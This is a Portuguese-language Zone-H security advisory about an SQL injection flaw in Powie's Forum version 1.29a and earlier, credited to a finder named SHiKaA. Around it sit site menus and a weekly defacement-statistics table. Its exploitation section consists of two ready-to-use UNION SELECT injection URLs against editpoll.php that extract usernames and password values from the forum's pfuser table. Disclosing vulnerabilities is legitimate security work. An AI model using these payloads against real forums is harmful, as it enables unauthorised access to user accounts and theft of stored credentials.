Zone-H
Home arrow Avisos de Segurança arrow Powie's Forum: Injeção de Codigos SQL
05 de julho de 2009
  
 
Ataques desta semana
O.S.  Defs.  %
Win 2003  4243  46.12%
Linux  3965  43.10%
Win 2000  486  5.28%
FreeBSD  208  2.26%
Win 2008  112  1.22%
Other  185  2.01%

Total de ataques: 9199 dos quais 3045 único(s) no ip e 6154 invasão(ões) em massa

Menu Principal
Home
Guerra Digital
Geopolítica
Notícias ITsec
Avisos de Segurança
Test Drive
360°
Sites atacados
Eventos do Zone-H
Fórum
Publicações
Zone-H Amigos/Parceiros
Contate-nos
Sobre este Site
Membros do Zone-H BR
Favoritos geral
Zone-H.org
Área de download
Powie's Forum: Injeção de Codigos SQL Imprimir E-mail
Avaliação do Usuário: / 1
PiorMelhor 
Por Raphael Martins (Ashiyakuza)   
17 de novembro de 2006

Nome do Script: Powie's Forum
Site do script: http://www.powie.de
Versão Afetada: 1.29a e anteriores

Encontrado por SHiKaA
Email: SHiKaA- [at] hotmail.com


Exploração:

http://www.site.com/[path]/editpoll.php?id=-1 UNION SELECT null,null,username,null FROM pfuser where id=1

http://www.site.com/[path]/editpoll.php?id=-1 UNION SELECT null,null,pwd,null FROM pfuser where id=1

 
< Anterior   Próximo >
[Voltar]
 
Top!
(C) 2009 Zone-H - Unrestricted Information
Top!